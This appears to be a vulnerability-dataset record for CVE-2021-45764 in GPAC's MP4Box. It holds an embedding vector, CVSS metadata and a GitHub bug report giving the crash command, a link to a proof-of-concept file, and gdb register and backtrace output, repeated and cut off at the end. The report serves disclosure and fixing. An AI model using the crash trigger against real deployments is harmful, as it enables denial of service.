-0.014279528521001339, 0.013442170806229115, 0.02599511295557022, 0.0133754787966609, -0.00016522513760719448, 0.006117151118814945, 0.015020552091300488, -0.006717380601912737, -0.002210103441029787, -0.006206074263900518, -0.005398358218371868, 0.004705500788986683, 0.028796182945370674, -0.03927426040172577, 0.020970972254872322, -0.004301642999053001, -0.009084951132535934, -0.006798893213272095, 0.010789305903017521, 0.028055159375071526, -0.00511676911264658, -0.026706496253609657, -0.004864821210503578, -0.01805133931338787, 0.008595875464379787, 0.0278032124042511, -0.02629152312874794, -0.031419407576322556, 0.006250535603612661, 0.023357069119811058, -0.017517801374197006, 0.01987425796687603, -0.013582965359091759, -0.028307108208537102, -0.011448817327618599, 0.008514363318681717, 0.014946449548006058, -0.022245533764362335, 0.009373950771987438, -0.0021971354726701975, 0.0072990842163562775, 0.004523950163275003, 0.0026528651360422373, 0.0010337281273677945, 0.004138617776334286, -0.0058466773480176926, 0.0019600079394876957, -0.00886264443397522, 0.008388388901948929, 0.019755693152546883, 0.005557678174227476, 0.011804508976638317, -0.012175020761787891, 0.005935600493103266, -0.02614331804215908, 0.016406266018748283, 0.03150833025574684, -0.0021156228613108397, -0.013960887677967548, 0.00007971794548211619, 0.025135526433587074, -0.011211689561605453, -0.0027288200799375772, 0.011752637103199959, 0.01852559484541416, 0.017384417355060577, 0.002623224165290594, 0.002365718362852931, 0.0012625192757695913, 0.01030764076858759, -0.018392210826277733, -0.019933538511395454, 0.002702884143218398, -0.027462340891361237, 0.009314668364822865, -0.0008077159291133285, 0.011063484475016594, -0.006395034957677126, 0.010396563448011875, -0.0029418643098324537, 0.006005997769534588, 0.010730024427175522, -0.004120092373341322, -0.015383653342723846, 0.008151261135935783, 0.01329396665096283, 0.003234568750485778, 0.0035346834920346737, -0.00013569997099693865, -0.012953095138072968, -0.02246784046292305, 0.022660506889224052, 0.021311843767762184, -0.006202368997037411, 0.01078189630061388, -0.005750344600528479, -0.0053576016798615456, -0.005494691431522369, 0.001692313002422452, 0.03239756077528, -0.022112149745225906, -0.0008720923215150833, -0.002300878753885627, -0.011522919870913029, 0.009077541530132294, -0.0021508214995265007, 0.012738198973238468, -0.027180751785635948, 0.015680063515901566, 0.010574408806860447, -0.0057244086638092995, 0.018584875389933586, 0.01131543330848217, -0.011033844202756882, 0.006528419442474842, -0.0009586995001882315, 0.015561499632894993, 0.013012377545237541, -0.0003904268960468471, -0.005691062659025192, 0.021326664835214615, 0.024335220456123352, 0.00503896176815033, 0.01215279009193182, -0.010566999204456806, -0.0002036657533608377, -0.008514363318681717, -0.03284217417240143, 0.031152639538049698, -0.009136823005974293, 0.012552943080663681, -0.014561116695404053, 0.046684496104717255, 0.00008510195038979873, -0.0025305962190032005, 0.002743640448898077, -0.0029937359504401684, 0.017369596287608147, 0.0042645917274057865, -0.01710282824933529, 0.020052103325724602, 0.011137587018311024, 0.009136823005974293, 0.02200840599834919, 0.02919633686542511, 0.0011513656936585903, 0.020763486623764038, -0.01536883320659399, 0.018466312438249588, 0.0247650146484375, -0.0034235299099236727, -0.0028640569653362036, -0.0028696146328002214, -0.023119941353797913, -0.0024231476709246635, 0.005646601319313049, 0.01010015420615673, 0.004134912509471178, 0.0038940799422562122, 0.01084117777645588, -0.01698426529765129, 0.024261118844151497, -0.03290145471692085, 0.00775110861286521, 0.0021823151037096977, -0.012745608575642109, 0.007958595640957355, 0.010648511350154877, 0.025165166705846786, 0.004490604158490896, -0.012286174111068249, 0.024824297055602074, 0.004987089894711971, 0.007358366157859564, -0.0026158138643950224, 0.002526890952140093, -0.01267150603234768, -0.017532622441649437, -0.010433614253997803, 0.0026862111408263445, 0.024364860728383064, 0.013079069554805756, 0.0034087093081325293, -0.00810679979622364, -0.0061690229922533035, 0.004460962954908609, 0.0024601989425718784, -0.00013338428107090294, 0.004768487997353077, 0.005813331343233585, -0.02858869731426239, 0.001989648910239339, -0.008744080550968647, 0.00032952401670627296, -0.015946831554174423, -0.013842323794960976, 0.00878854189068079, 0.010789305903017521, 0.014864936470985413, 0.009136823005974293, -0.005761459935456514, 0.0017571526113897562, 0.0030233769211918116, -0.007273148279637098, 0.007099007721990347, 0.0005511364433914423, -0.013960887677967548, 0.006157907657325268, 0.002213808475062251, -0.0049648592248559, -0.026528650894761086, 0.007958595640957355, -0.006706265266984701, -0.008884875103831291, -0.012219482101500034, -0.024868758395314217, -0.015005731023848057, -0.014346220530569553, -0.021756457164883614, -0.004060810431838036, 0.017369596287608147, -0.013405120000243187, -0.01895538717508316, 0.012145379558205605, -0.004394270945340395, 0.021623073145747185, -0.022378917783498764, -0.016569292172789574, -0.016139497980475426, 0.014813065528869629, 0.01867379993200302, -0.01382750365883112, 0.016747137531638145, 0.00020632881205528975, 0.0052427430637180805, 0.0025602371897548437, 0.0005654937704093754, 0.017843851819634438, 0.0198594368994236, 0.010344691574573517, -0.00932207889854908, 0.003831092966720462, 0.014635219238698483, 0.0017469635931774974, -0.010641101747751236, -0.010589229874312878, 0.002741788048297167, -0.02261604554951191, 0.013916426338255405, -0.019978001713752747, -0.010618871077895164, -0.03239756077528, -0.0023935067001730204, -0.013545914553105831, 0.029240798205137253, 0.025891371071338654, 0.015650421380996704, 0.01606539450585842, -0.01139694545418024, 0.012664096429944038, 0.021208100020885468, 0.0052872044034302235, 0.009314668364822865, -0.0010013083228841424, 0.010678152553737164, -0.012323224917054176, -0.022556763142347336, 0.01023353822529316, -0.015250269323587418, -0.018392210826277733, -0.0018164345528930426, -0.018110621720552444, 0.007825210690498352, 0.004683270119130611, -0.016154319047927856, 0.003931131213903427, 0.03013002686202526, 0.006624752655625343, -0.01831810735166073, -0.0058503826148808, -0.0043720402754843235, 0.01122650969773531, 0.014383271336555481, -0.010441024787724018, 0.00034480763133615255, -0.008054927922785282, -0.035539500415325165, 0.0020470782183110714, 0.008410619571805, 0.003264209721237421, -0.026202600449323654, -0.008573644794523716, -0.018614517524838448, -0.030974794179201126, -0.008855233900249004, -0.00150057312566787, 0.014524065889418125, 0.012300994247198105, -0.003556914161890745, 0.005765164736658335, -0.006680329330265522, -0.00045410863822326064, 0.004898167215287685, 0.000052711104217451066, 0.002554679522290826, -0.001609874190762639, -0.0007827063673175871, 0.017088009044528008, 0.0045869373716413975, -0.006628457456827164, -0.008899695239961147, -0.015680063515901566, 0.04117128252983093, -0.004505424294620752, 0.01785867288708687, 0.00013396319991443306, -0.002439820673316717, 0.007258327677845955, -0.013553325086832047, 0.0040422845631837845, -0.0067025600001215935, -0.005320550873875618, 0.010381743311882019, 0.0063209328800439835, -0.01728067360818386, 0.003336459631100297, 0.003264209721237421, -0.009492514654994011, 0.013783042319118977, -0.017339956015348434, 0.017147289589047432, 0.0036847407463937998, 0.004668449983000755, 0.002502807881683111, 0.012634455226361752, -0.014798244461417198, -0.0007095302571542561, -0.025743165984749794, -0.014946449548006058, 0.00901825912296772, -0.005379832349717617, -0.023016197606921196, -0.0234015304595232, -0.001392198377288878, -0.007232392206788063, -0.004568411502987146, 0.009507334791123867, 0.002437968272715807, -0.028929568827152252, 0.00954438652843237, -0.0007827063673175871, 0.005387242883443832, 0.01713247038424015, -0.012908633798360825, 0.029418643563985825, -0.002736230380833149, -0.008410619571805, -0.008581055328249931, -0.025120705366134644, 0.0035865551326423883, -0.006150497123599052, -0.0014070188626646996, 0.005416883621364832, -0.016761958599090576, -0.005339076276868582, 0.007280558347702026, 0.021815739572048187, -0.011685945093631744, -0.010255768895149231, -0.011567381210625172, 0.005161230452358723, 0.00005609781510429457, -0.0009424895979464054, 0.017176931723952293, 0.00840320996940136, -0.010396563448011875, 0.019177695736289024, -0.005131589714437723, -0.00909236166626215, -0.004642514046281576, -0.008054927922785282, -0.012878993526101112, 0.027788391336798668, -0.005298319738358259, 0.02125256136059761, 0.015531858429312706, -0.004153438378125429, 0.011960123665630817, -0.0008957124664448202, -0.006046753842383623, -0.0011421028757467866, 0.009670360013842583, 0.029626131057739258, 0.009722231887280941, 0.012938275001943111, 0.021208100020885468, -0.0022675327491015196, 0.015843087807297707, 0.01713247038424015, 0.0033920363057404757, 0.007024905178695917, 0.011611842550337315, 0.008618106134235859, -0.031419407576322556, -0.00450912956148386, 0.01679159887135029, 0.0013245799345895648, 0.002804775023832917, -0.010730024427175522, -0.014375860802829266, 0.007691826671361923, 0.035984113812446594, 0.010648511350154877, -0.005424294155091047, 0.017962416633963585, -0.009344309568405151, -0.018125440925359726, 0.003983002621680498, 0.021208100020885468, 0.02020030841231346, -0.00893674697726965, -0.012434379197657108, -0.0019729756750166416, 0.006513598840683699, -0.003920015878975391, -0.008825592696666718, -0.004397976212203503, -0.010989382863044739, -0.0006507114740088582, -0.0011346926912665367, -0.015250269323587418, -0.003334606997668743, -0.015517037361860275, -0.0035809974651783705, 0.006050459109246731, 0.009070130996406078, 0.00526867900043726, -0.01836256869137287, -0.007402827497571707, -0.012330635450780392, 0.003410561941564083, -0.014561116695404053, -0.023312607780098915, 0.0016321048606187105, -0.01877754181623459, -0.018925746902823448, 0.0013486632378771901, 0.0018201395869255066, -0.0010726319160312414, 0.014064631424844265, 0.005757754668593407, -0.02980397641658783, 0.004957449156790972, -0.001615431858226657, 0.0036532471422106028, -0.011293202638626099, 0.01099679246544838, 0.01213796902447939, -0.009351720102131367, 0.011085715144872665, -0.004805539269000292, 0.017073187977075577, -0.013382889330387115, -0.004453552886843681, 0.003721791785210371, -0.003964477218687534, -0.02752162329852581, -0.006269061006605625, 0.00009187537216348574, 0.01742887869477272, -0.006172727793455124, -0.023282967507839203, 0.009062720462679863, -0.0029437169432640076, -0.0023101416882127523, 0.01053735800087452, -0.004712911322712898, 0.014805654995143414, -0.007287968881428242, 0.003417972242459655, 0.021430406719446182, 0.007980826310813427, 0.01831810735166073, 0.013086480088531971, -0.003979297820478678, 0.006613637320697308, -0.01836256869137287, 0.012011995539069176, 0.0034012990072369576, -0.012871582992374897, 0.01399793941527605, 0.02063010260462761, -0.007339840289205313, 0.012486250139772892, -0.010737434029579163, 0.008877464570105076, -0.0029048132710158825, -0.007161994930356741, 0.014620399102568626, 0.0007350029773078859, -0.010248358361423016, -0.001392198377288878, -0.004994500428438187, -0.023016197606921196, 0.009010848589241505, -0.0074769300408661366, 0.001952597638592124, -0.007602903991937637, 0.010641101747751236, 0.005961536429822445, 0.0027677237521857023, 0.0005201060557737947, 0.008262415416538715, 0.015709703788161278, 0.032190073281526566, -0.006265356205403805, 0.009381361305713654, -0.015383653342723846, 0.012063867412507534, -0.01099679246544838, -0.0005951347411610186, 0.020141026005148888, -0.012775249779224396, 0.0007725172908976674, -0.021741637960076332, -0.014272117987275124, -0.01852559484541416, 0.01987425796687603, -0.012730788439512253, -0.012145379558205605, 0.02826264686882496, -0.0030233769211918116, -0.0036847407463937998, 0.013871964998543262, 0.0046388087794184685, 0.0002690842666197568, -0.011426586657762527, 0.011648893356323242, 0.0048537058755755424, -0.004023759160190821, 0.014331399463117123, -0.012782660312950611, -0.0181847233325243, 0.020422615110874176, 0.012189840897917747, 0.053857605904340744, 0.0003158613690175116, -0.004227540455758572, 0.011493278667330742, -0.01420542597770691, -0.0184959527105093, 0.015932010486721992, -0.0071286484599113464, -0.0019803859759122133, -0.005817036610096693, -0.012278763577342033, 0.008684798143804073, 0.007102712988853455, -0.02460198849439621, -0.012604814022779465, 0.003264209721237421, -0.0025343012530356646, 0.004690680652856827, -0.012175020761787891, 0.0002588951901998371, 0.0065506501123309135, -0.003708824049681425, -0.004987089894711971, 0.016272881999611855, 0.012515891343355179, 0.005602139513939619, -0.0032104854471981525, 0.005294614937156439, 0.024038810282945633, -0.022126968950033188, 0.031271204352378845, 0.0115451505407691, 0.02215661108493805, 0.007736288011074066, 0.008618106134235859, 0.011152408085763454, -0.0010624427814036608, 0.017147289589047432, -0.02306065894663334, -0.010915280319750309, 0.014064631424844265, 0.008744080550968647, -0.011960123665630817, -0.005231627728790045, 0.010322460904717445, -0.008803362026810646, -0.004275707062333822, -0.020600460469722748, -0.003901490243151784, 0.0025769101921468973, -0.016850881278514862, 0.008744080550968647, -0.011463637463748455, 0.016435908153653145, -0.0027177047450095415, -0.0063728042878210545, 0.013212453573942184, 0.0053576016798615456, -0.0002663054037839174, -0.0014950154582038522, -0.019192514941096306, -0.023268146440386772, -0.019903898239135742, 0.019518565386533737, -0.009522155858576298, 0.012219482101500034, 0.007691826671361923, 0.009655539877712727, 0.005909664556384087, 0.0066580986604094505, 0.008655157871544361, -0.005294614937156439, 0.002508365549147129, -0.006254240404814482, -0.013405120000243187, -0.03625088185071945, 0.00023701181635260582, 0.00729537894949317, -0.009596257470548153, 0.012656685896217823, 0.0012319519883021712, -0.0064283814281225204, -0.014568527229130268, -0.00886264443397522, 0.01421283558011055, -0.02689916267991066, -0.0013449580874294043, 0.001982238609343767, -0.003045607591047883, 0.003154908772557974, 0.01542811468243599, 0.002784396754577756, 0.005550268106162548, 0.0031252678018063307, -0.008610696531832218, -0.009907487779855728, 0.02400917001068592, 0.009010848589241505, 0.006350573617964983, -0.008833003230392933, -0.01460557896643877, 0.0037292020861059427, -0.011019023135304451, 0.004538770765066147, 0.0011828591814264655, -0.03198258578777313, -0.02950756624341011, -0.029552027583122253, -0.016850881278514862, -0.019681591540575027, -0.01880718395113945, 0.02583208866417408, -0.012145379558205605, 0.0032882930245250463, -0.0014792686561122537, -0.0032567994203418493, -0.0011180195724591613, 0.013642247766256332, 0.014079451560974121, -0.018866464495658875, 0.016287703067064285, -0.00683964928612113, 0.02676577866077423, 0.006513598840683699, -0.003043755190446973, -0.001055032596923411, 0.011063484475016594, 0.025461576879024506, 0.002886287635192275, 0.017517801374197006, 0.02049671672284603, 0.0006414487143047154, 0.02353491447865963, 0.027566084638237953, 0.018377389758825302, 0.017621545121073723, 0.007488045375794172, 0.014916808344423771, 0.0062134843319654465, -0.017962416633963585, -0.023357069119811058, 0.06402445584535599, -0.010418794117867947, -0.000011730464393622242, -0.009685181081295013, 0.009344309568405151, -0.014383271336555481, 0.00023759074974805117, 0.0011337663745507598, -0.013494042679667473, 0.03696226701140404, 0.001317169750109315, 0.018125440925359726, -0.009196105413138866, -0.010700383223593235, 0.013056838884949684, -0.005709588062018156, 0.01339029986411333, 0.0022619750816375017, 0.012100918218493462, -0.004579526837915182, -0.003636574139818549, -0.006565470714122057, 0.0237127598375082, 0.004635103512555361, 0.00924797635525465, -0.011056074872612953, 0.004501719493418932, 0.011537740007042885, 0.001616358058527112, -0.022897634655237198, 0.00002441615470161196, 0.005561383441090584, -0.011019023135304451, 0.026484189555048943, 0.003931131213903427, 0.010641101747751236, 0.004171963781118393, 0.011056074872612953, -0.017829032614827156, -0.009966769255697727, -0.003082658862695098, -0.0082550048828125, 0.006065279711037874, -0.02154897153377533, 0.021148817613720894, -0.020437436178326607, 0.009381361305713654, 0.037080828100442886, 0.004112681839615107, -0.010137205012142658, -0.004283117596060038, 0.004238655790686607, 0.002169347135350108, -0.005368717014789581, 0.016421087086200714, 0.014249887317419052, -0.014753783121705055, 0.009529565460979939, -0.02415737509727478, 0.011337663978338242, -0.019963180646300316, 0.007854851894080639, 0.02707700803875923 ]
CVE-2021-45764
2022-01-14T20:15:14.977000
GPAC v1.1.0 was discovered to contain an invalid memory address dereference via the function shift_chunk_offsets.isra().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1971" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1971
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in shift_chunk_offsets.isra(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -hint poc_9 ``` [poc_9.zip](https://github.com/gpac/gpac/files/7693929/poc_9.zip) **Result** ``` [iso file] Unknown box type stbU in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Box "trak" is larger than container box [iso file] Box "moov" size 256 (start 20) invalid (read 2209) [iso file] Unknown top-level box type 079Fmd Saving ./poc/poc_9: In-place rewrite [1] 2265002 segmentation fault ./MP4Box -hint ./poc/poc_9 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x5555555cc6e0 ◂— 0x6d696e66 /* 'fnim' */ RBX 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */ RCX 0x0 RDX 0x5555555cf160 ◂— 0x6d646961 /* 'aidm' */ RDI 0x28 RSI 0x34 R8 0x14 R9 0x0 R10 0x7ffff775d6fa ◂— 'gf_isom_box_size' R11 0x7ffff796bce0 (gf_isom_box_size) ◂— endbr64 R12 0x5555555c72a0 ◂— 0xffffffec R13 0x14 R14 0x1 R15 0x7fffffff7e80 ◂— 0x0 RBP 0x0 RSP 0x7fffffff7e00 ◂— 0xf7747c68 RIP 0x7ffff7981ba3 (shift_chunk_offsets.isra+19) ◂— mov esi, dword ptr [rsi] ─────────────────────────────────[ DISASM ]───────────────────────────────── ► 0x7ffff7981ba3 <shift_chunk_offsets.isra+19> mov esi, dword ptr [rsi] 0x7ffff7981ba5 <shift_chunk_offsets.isra+21> mov qword ptr [rsp + 8], rdi 0x7ffff7981baa <shift_chunk_offsets.isra+26> mov qword ptr [rsp + 0x10], rdx 0x7ffff7981baf <shift_chunk_offsets.isra+31> mov dword ptr [rsp + 0x2c], r9d 0x7ffff7981bb4 <shift_chunk_offsets.isra+36> test esi, esi 0x7ffff7981bb6 <shift_chunk_offsets.isra+38> je shift_chunk_offsets.isra+175 <shift_chunk_offsets.isra+175> ↓ 0x7ffff7981c3f <shift_chunk_offsets.isra+175> add rsp, 0x38 0x7ffff7981c43 <shift_chunk_offsets.isra+179> xor eax, eax 0x7ffff7981c45 <shift_chunk_offsets.isra+181> pop rbx 0x7ffff7981c46 <shift_chunk_offsets.isra+182> pop rbp 0x7ffff7981c47 <shift_chunk_offsets.isra+183> pop r12 ─────────────────────────────────[ STACK ]──────────────────────────────────00:0000│ rsp 0x7fffffff7e00 ◂— 0xf7747c68 01:0008│ 0x7fffffff7e08 ◂— 0x0 02:0010│ 0x7fffffff7e10 ◂— 0x999 03:0018│ 0x7fffffff7e18 ◂— 0x34 /* '4' */ 04:0020│ 0x7fffffff7e20 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ... 05:0028│ 0x7fffffff7e28 —▸ 0x7fffffff7f68 —▸ 0x7ffff7751b48 ◂— 0xe0012000053a2 06:0030│ 0x7fffffff7e30 —▸ 0x7ffff775d6fa ◂— 'gf_isom_box_size' 07:0038│ 0x7fffffff7e38 —▸ 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */ ───────────────────────────────[ BACKTRACE ]──────────────────────────────── ► f 0 0x7ffff7981ba3 shift_chunk_offsets.isra+19 f 1 0x7ffff7981fd0 inplace_shift_moov_meta_offsets+224 f 2 0x7ffff7982a5c inplace_shift_mdat+732 f 3 0x7ffff7986c29 WriteToFile+2713 f 4 0x7ffff7978042 gf_isom_write+370 f 5 0x7ffff79780c8 gf_isom_close+24 f 6 0x55555557ad12 mp4boxMain+7410 f 7 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────pwndbg> bt #0 0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7981fd0 in inplace_shift_moov_meta_offsets () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7982a5c in inplace_shift_mdat () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7986c29 in WriteToFile () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7978042 in gf_isom_write () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff79780c8 in gf_isom_close () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x000055555557ad12 in mp4boxMain () #7 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #8 0x000055555556c45e in _start () ```
Invalid memory address dereference in shift_chunk_offsets.isra()
https://api.github.com/repos/gpac/gpac/issues/1971/comments
0
2021-12-10T15:59:06
2021-12-13T13:22:07Z
https://github.com/gpac/gpac/issues/1971
1,076,993,672
1,971
true
This is a GitHub Issue repo:gpac owner:gpac Title : Invalid memory address dereference in shift_chunk_offsets.isra() Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in shift_chunk_offsets.isra(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -hint poc_9 ``` [poc_9.zip](https://github.com/gpac/gpac/files/7693929/poc_9.zip) **Result** ``` [iso file] Unknown box type stbU in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Box "trak" is larger than container box [iso file] Box "moov" size 256 (start 20) invalid (read 2209) [iso file] Unknown top-level box type 079Fmd Saving ./poc/poc_9: In-place rewrite [1] 2265002 segmentation fault ./MP4Box -hint ./poc/poc_9 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x5555555cc6e0 ◂— 0x6d696e66 /* 'fnim' */ RBX 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */ RCX 0x0 RDX 0x5555555cf160 ◂— 0x6d646961 /* 'aidm' */ RDI 0x28 RSI 0x34 R8 0x14 R9 0x0 R10 0x7ffff775d6fa ◂— 'gf_isom_box_size' R11 0x7ffff796bce0 (gf_isom_box_size) ◂— endbr64 R12 0x5555555c72a0 ◂— 0xffffffec R13 0x14 R14 0x1 R15 0x7fffffff7e80 ◂— 0x0 RBP 0x0 RSP 0x7fffffff7e00 ◂— 0xf7747c68 RIP 0x7ffff7981ba3 (shift_chunk_offsets.isra+19) ◂— mov esi, dword ptr [rsi] ─────────────────────────────────[ DISASM ]───────────────────────────────── ► 0x7ffff7981ba3 <shift_chunk_offsets.isra+19> mov esi, dword ptr [rsi] 0x7ffff7981ba5 <shift_chunk_offsets.isra+21> mov qword ptr [rsp + 8], rdi 0x7ffff7981baa <shift_chunk_offsets.isra+26> mov qword ptr [rsp + 0x10], rdx 0x7ffff7981baf <shift_chunk_offsets.isra+31> mov dword ptr [rsp + 0x2c], r9d 0x7ffff7981bb4 <shift_chunk_offsets.isra+36> test esi, esi 0x7ffff7981bb6 <shift_chunk_offsets.isra+38> je shift_chunk_offsets.isra+175 <shift_chunk_offsets.isra+175> ↓ 0x7ffff7981c3f <shift_chunk_offsets.isra+175> add rsp, 0x38 0x7ffff7981c43 <shift_chunk_offsets.isra+179> xor eax, eax 0x7ffff7981c45 <shift_chunk_offsets.isra+181> pop rbx 0x7ffff7981c46 <shift_chunk_offsets.isra+182> pop rbp 0x7ffff7981c47 <shift_chunk_offsets.isra+183> pop r12 ─────────────────────────────────[ STACK ]──────────────────────────────────00:0000│ rsp 0x7fffffff7e00 ◂— 0xf7747c68 01:0008│ 0x7fffffff7e08 ◂— 0x0 02:0010│ 0x7fffffff7e10 ◂— 0x999 03:0018│ 0x7fffffff7e18 ◂— 0x34 /* '4' */ 04:0020│ 0x7fffffff7e20 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ... 05:0028│ 0x7fffffff7e28 —▸ 0x7fffffff7f68 —▸ 0x7ffff7751b48 ◂— 0xe0012000053a2 06:0030│ 0x7fffffff7e30 —▸ 0x7ffff775d6fa ◂— 'gf_isom_box_size' 07:0038│ 0x7fffffff7e38 —▸ 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */ ───────────────────────────────[ BACKTRACE ]──────────────────────────────── ► f 0 0x7ffff7981ba3 shift_chunk_offsets.isra+19 f 1 0x7ffff7981fd0 inplace_shift_moov_meta_offsets+224 f 2 0x7ffff7982a5c inplace_shift_mdat+732 f 3 0x7ffff7986c29 WriteToFile+2713 f 4 0x7ffff7978042 gf_isom_write+370 f 5 0x7ffff79780c8 gf_isom_close+24 f 6 0x55555557ad12 mp4boxMain+7410 f 7 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────pwndbg> bt #0 0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7981fd0 in inplace_shift_moov_meta_offsets () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7982a5c in inplace_shift_mdat () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7986c29 in WriteToFile () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7978042 in gf_isom_write () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff79780c8 in gf_isom_close () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x000055555557ad12 in mp4boxMain () #7 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, 